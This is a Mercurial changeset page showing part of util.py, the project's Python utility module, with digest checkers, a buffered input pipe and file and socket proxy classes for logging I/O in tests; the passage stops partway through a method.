##// END OF EJS Templates
util: deprecate procutil proxy functions (API)...
Yuya Nishihara -
r37139:24ab3381 default
parent child Browse files
Show More
@@ -1,3851 +1,3860
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import tempfile
34 import tempfile
35 import time
35 import time
36 import traceback
36 import traceback
37 import warnings
37 import warnings
38 import zlib
38 import zlib
39
39
40 from . import (
40 from . import (
41 encoding,
41 encoding,
42 error,
42 error,
43 i18n,
43 i18n,
44 node as nodemod,
44 node as nodemod,
45 policy,
45 policy,
46 pycompat,
46 pycompat,
47 urllibcompat,
47 urllibcompat,
48 )
48 )
49 from .utils import (
49 from .utils import (
50 dateutil,
50 dateutil,
51 procutil,
51 procutil,
52 stringutil,
52 stringutil,
53 )
53 )
54
54
55 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
56 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
57 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
58
58
59 b85decode = base85.b85decode
59 b85decode = base85.b85decode
60 b85encode = base85.b85encode
60 b85encode = base85.b85encode
61
61
62 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
63 empty = pycompat.empty
64 httplib = pycompat.httplib
64 httplib = pycompat.httplib
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 rename = platform.rename
115 rename = platform.rename
116 removedirs = platform.removedirs
116 removedirs = platform.removedirs
117 samedevice = platform.samedevice
117 samedevice = platform.samedevice
118 samefile = platform.samefile
118 samefile = platform.samefile
119 samestat = platform.samestat
119 samestat = platform.samestat
120 setflags = platform.setflags
120 setflags = platform.setflags
121 split = platform.split
121 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
123 statisexec = platform.statisexec
124 statislink = platform.statislink
124 statislink = platform.statislink
125 umask = platform.umask
125 umask = platform.umask
126 unlink = platform.unlink
126 unlink = platform.unlink
127 username = platform.username
127 username = platform.username
128
128
129 try:
129 try:
130 recvfds = osutil.recvfds
130 recvfds = osutil.recvfds
131 except AttributeError:
131 except AttributeError:
132 pass
132 pass
133
133
134 # Python compatibility
134 # Python compatibility
135
135
136 _notset = object()
136 _notset = object()
137
137
138 def _rapply(f, xs):
138 def _rapply(f, xs):
139 if xs is None:
139 if xs is None:
140 # assume None means non-value of optional data
140 # assume None means non-value of optional data
141 return xs
141 return xs
142 if isinstance(xs, (list, set, tuple)):
142 if isinstance(xs, (list, set, tuple)):
143 return type(xs)(_rapply(f, x) for x in xs)
143 return type(xs)(_rapply(f, x) for x in xs)
144 if isinstance(xs, dict):
144 if isinstance(xs, dict):
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 return f(xs)
146 return f(xs)
147
147
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    # The identity function needs no traversal at all; returning the input
    # unchanged is a fast path that matters mainly on py2.
    if f is not pycompat.identity:
        return _rapply(f, xs)
    return xs
170
170
def bitsfrom(container):
    """OR together every value in ``container`` into a single bitmask.

    An empty container yields 0.
    """
    mask = 0
    for flag in container:
        mask |= flag
    return mask
176
176
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
197
197
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    # outside of the test suite (_dowarn unset) this is deliberately a no-op
    if not _dowarn:
        return
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    # bump stacklevel so the warning points at our caller, not at us
    warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207
207
# Mapping of supported digest names to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every entry in the strength ranking must be available
# (NOTE: the loop variable is deliberately named ``k``; later code reads the
# leaked module-level ``k``)
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
218
218
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create hashers for every name in ``digests``; optionally seed
        them with the initial data ``s``. Unknown names abort."""
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every tracked hasher."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the current hex digest for digest type ``key``."""
        if key not in DIGESTS:
            # BUG FIX: this previously formatted the message with ``k``, a
            # stale module-level loop variable, instead of ``key`` — so the
            # error always reported the wrong digest name.
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        # iterate over the digest names being tracked
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
265
265
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size              # expected total byte count
        self._got = 0                  # bytes read so far
        self._digests = dict(digests)  # name -> expected hex digest
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle while hashing and counting bytes."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Abort unless the observed size and all digests match."""
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for name, expect in self._digests.items():
            got = self._digester[name]
            if expect != got:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (name, expect, got))
297
297
298 try:
298 try:
299 buffer = buffer
299 buffer = buffer
300 except NameError:
300 except NameError:
301 def buffer(sliceable, offset=0, length=None):
301 def buffer(sliceable, offset=0, length=None):
302 if length is not None:
302 if length is not None:
303 return memoryview(sliceable)[offset:offset + length]
303 return memoryview(sliceable)[offset:offset + length]
304 return memoryview(sliceable)[offset:]
304 return memoryview(sliceable)[offset:]
305
305
306 _chunksize = 4096
306 _chunksize = 4096
307
307
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []   # buffered chunks, newest last
        self._eof = False   # True once the underlying pipe hit EOF
        self._lenbuf = 0    # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # keep pulling from the pipe until enough bytes are buffered or EOF
        while not self._eof and self._lenbuf < size:
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # index of the first newline within the most recent chunk, or -1
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while not self._eof and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        joined = self._buffer[0]
        if len(self._buffer) > 1:
            joined = ''.join(self._buffer)

        data = joined[:size]
        remainder = joined[len(data):]
        if remainder:
            self._buffer = [remainder]
            self._lenbuf = len(remainder)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # unbuffered os.read so polling callers see the real pipe state
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
410
410
def mmapread(fp):
    """Return a read-only mmap of ``fp``'s contents.

    ``fp`` may be a file object or a raw file descriptor. An empty file,
    which cannot be mmapped, yields an empty buffer instead of an error.
    """
    try:
        # accept either a file object (use its fileno) or a bare descriptor
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
421
421
422 class fileobjectproxy(object):
422 class fileobjectproxy(object):
423 """A proxy around file objects that tells a watcher when events occur.
423 """A proxy around file objects that tells a watcher when events occur.
424
424
425 This type is intended to only be used for testing purposes. Think hard
425 This type is intended to only be used for testing purposes. Think hard
426 before using it in important code.
426 before using it in important code.
427 """
427 """
428 __slots__ = (
428 __slots__ = (
429 r'_orig',
429 r'_orig',
430 r'_observer',
430 r'_observer',
431 )
431 )
432
432
433 def __init__(self, fh, observer):
433 def __init__(self, fh, observer):
434 object.__setattr__(self, r'_orig', fh)
434 object.__setattr__(self, r'_orig', fh)
435 object.__setattr__(self, r'_observer', observer)
435 object.__setattr__(self, r'_observer', observer)
436
436
437 def __getattribute__(self, name):
437 def __getattribute__(self, name):
438 ours = {
438 ours = {
439 r'_observer',
439 r'_observer',
440
440
441 # IOBase
441 # IOBase
442 r'close',
442 r'close',
443 # closed if a property
443 # closed if a property
444 r'fileno',
444 r'fileno',
445 r'flush',
445 r'flush',
446 r'isatty',
446 r'isatty',
447 r'readable',
447 r'readable',
448 r'readline',
448 r'readline',
449 r'readlines',
449 r'readlines',
450 r'seek',
450 r'seek',
451 r'seekable',
451 r'seekable',
452 r'tell',
452 r'tell',
453 r'truncate',
453 r'truncate',
454 r'writable',
454 r'writable',
455 r'writelines',
455 r'writelines',
456 # RawIOBase
456 # RawIOBase
457 r'read',
457 r'read',
458 r'readall',
458 r'readall',
459 r'readinto',
459 r'readinto',
460 r'write',
460 r'write',
461 # BufferedIOBase
461 # BufferedIOBase
462 # raw is a property
462 # raw is a property
463 r'detach',
463 r'detach',
464 # read defined above
464 # read defined above
465 r'read1',
465 r'read1',
466 # readinto defined above
466 # readinto defined above
467 # write defined above
467 # write defined above
468 }
468 }
469
469
470 # We only observe some methods.
470 # We only observe some methods.
471 if name in ours:
471 if name in ours:
472 return object.__getattribute__(self, name)
472 return object.__getattribute__(self, name)
473
473
474 return getattr(object.__getattribute__(self, r'_orig'), name)
474 return getattr(object.__getattribute__(self, r'_orig'), name)
475
475
476 def __nonzero__(self):
476 def __nonzero__(self):
477 return bool(object.__getattribute__(self, r'_orig'))
477 return bool(object.__getattribute__(self, r'_orig'))
478
478
479 __bool__ = __nonzero__
479 __bool__ = __nonzero__
480
480
481 def __delattr__(self, name):
481 def __delattr__(self, name):
482 return delattr(object.__getattribute__(self, r'_orig'), name)
482 return delattr(object.__getattribute__(self, r'_orig'), name)
483
483
484 def __setattr__(self, name, value):
484 def __setattr__(self, name, value):
485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486
486
487 def __iter__(self):
487 def __iter__(self):
488 return object.__getattribute__(self, r'_orig').__iter__()
488 return object.__getattribute__(self, r'_orig').__iter__()
489
489
490 def _observedcall(self, name, *args, **kwargs):
490 def _observedcall(self, name, *args, **kwargs):
491 # Call the original object.
491 # Call the original object.
492 orig = object.__getattribute__(self, r'_orig')
492 orig = object.__getattribute__(self, r'_orig')
493 res = getattr(orig, name)(*args, **kwargs)
493 res = getattr(orig, name)(*args, **kwargs)
494
494
495 # Call a method on the observer of the same name with arguments
495 # Call a method on the observer of the same name with arguments
496 # so it can react, log, etc.
496 # so it can react, log, etc.
497 observer = object.__getattribute__(self, r'_observer')
497 observer = object.__getattribute__(self, r'_observer')
498 fn = getattr(observer, name, None)
498 fn = getattr(observer, name, None)
499 if fn:
499 if fn:
500 fn(res, *args, **kwargs)
500 fn(res, *args, **kwargs)
501
501
502 return res
502 return res
503
503
504 def close(self, *args, **kwargs):
504 def close(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'close', *args, **kwargs)
506 r'close', *args, **kwargs)
507
507
508 def fileno(self, *args, **kwargs):
508 def fileno(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'fileno', *args, **kwargs)
510 r'fileno', *args, **kwargs)
511
511
512 def flush(self, *args, **kwargs):
512 def flush(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'flush', *args, **kwargs)
514 r'flush', *args, **kwargs)
515
515
516 def isatty(self, *args, **kwargs):
516 def isatty(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'isatty', *args, **kwargs)
518 r'isatty', *args, **kwargs)
519
519
520 def readable(self, *args, **kwargs):
520 def readable(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'readable', *args, **kwargs)
522 r'readable', *args, **kwargs)
523
523
524 def readline(self, *args, **kwargs):
524 def readline(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'readline', *args, **kwargs)
526 r'readline', *args, **kwargs)
527
527
528 def readlines(self, *args, **kwargs):
528 def readlines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'readlines', *args, **kwargs)
530 r'readlines', *args, **kwargs)
531
531
532 def seek(self, *args, **kwargs):
532 def seek(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'seek', *args, **kwargs)
534 r'seek', *args, **kwargs)
535
535
536 def seekable(self, *args, **kwargs):
536 def seekable(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'seekable', *args, **kwargs)
538 r'seekable', *args, **kwargs)
539
539
540 def tell(self, *args, **kwargs):
540 def tell(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'tell', *args, **kwargs)
542 r'tell', *args, **kwargs)
543
543
544 def truncate(self, *args, **kwargs):
544 def truncate(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'truncate', *args, **kwargs)
546 r'truncate', *args, **kwargs)
547
547
548 def writable(self, *args, **kwargs):
548 def writable(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'writable', *args, **kwargs)
550 r'writable', *args, **kwargs)
551
551
552 def writelines(self, *args, **kwargs):
552 def writelines(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'writelines', *args, **kwargs)
554 r'writelines', *args, **kwargs)
555
555
556 def read(self, *args, **kwargs):
556 def read(self, *args, **kwargs):
557 return object.__getattribute__(self, r'_observedcall')(
557 return object.__getattribute__(self, r'_observedcall')(
558 r'read', *args, **kwargs)
558 r'read', *args, **kwargs)
559
559
560 def readall(self, *args, **kwargs):
560 def readall(self, *args, **kwargs):
561 return object.__getattribute__(self, r'_observedcall')(
561 return object.__getattribute__(self, r'_observedcall')(
562 r'readall', *args, **kwargs)
562 r'readall', *args, **kwargs)
563
563
564 def readinto(self, *args, **kwargs):
564 def readinto(self, *args, **kwargs):
565 return object.__getattribute__(self, r'_observedcall')(
565 return object.__getattribute__(self, r'_observedcall')(
566 r'readinto', *args, **kwargs)
566 r'readinto', *args, **kwargs)
567
567
568 def write(self, *args, **kwargs):
568 def write(self, *args, **kwargs):
569 return object.__getattribute__(self, r'_observedcall')(
569 return object.__getattribute__(self, r'_observedcall')(
570 r'write', *args, **kwargs)
570 r'write', *args, **kwargs)
571
571
572 def detach(self, *args, **kwargs):
572 def detach(self, *args, **kwargs):
573 return object.__getattribute__(self, r'_observedcall')(
573 return object.__getattribute__(self, r'_observedcall')(
574 r'detach', *args, **kwargs)
574 r'detach', *args, **kwargs)
575
575
576 def read1(self, *args, **kwargs):
576 def read1(self, *args, **kwargs):
577 return object.__getattribute__(self, r'_observedcall')(
577 return object.__getattribute__(self, r'_observedcall')(
578 r'read1', *args, **kwargs)
578 r'read1', *args, **kwargs)
579
579
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _notify(self, event, *args):
        # Deliver ``event`` to the observer attached to the underlying
        # pipe, if the observer defines a handler for it.
        handler = getattr(self._input._observer, event, None)
        if handler:
            handler(*args)

    def _fillbuffer(self):
        data = super(observedbufferedinputpipe, self)._fillbuffer()
        self._notify(r'osread', data, _chunksize)
        return data

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        data = super(observedbufferedinputpipe, self).read(size)
        self._notify(r'bufferedread', data, size)
        return data

    def readline(self, *args, **kwargs):
        data = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
        self._notify(r'bufferedreadline', data)
        return data
619
619
# Socket methods that are intercepted (and reported to the observer)
# rather than passed straight through to the wrapped socket.
PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        # Fixed: this used to dispatch to the non-existent name
        # r'recv_info', raising AttributeError on the wrapped socket.
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)
739
739
class baseproxyobserver(object):
    """Shared payload-logging helper for the file/socket observers."""

    def _writedata(self, data):
        # Payload logging disabled: just terminate the "<name>> op(...)"
        # line the caller already started (when API logging is on).
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        if b'\n' not in data:
            # Simple case writes all data on a single line.
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapedata(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapedata(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        for chunk in data.splitlines(True):
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapedata(chunk)))
        self.fh.flush()
767
767
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        # fh: stream the log is written to; name: label for each log line.
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.logdata = logdata
        self.logdataapis = logdataapis

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        # res is a byte count (or None); log only the bytes actually read.
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

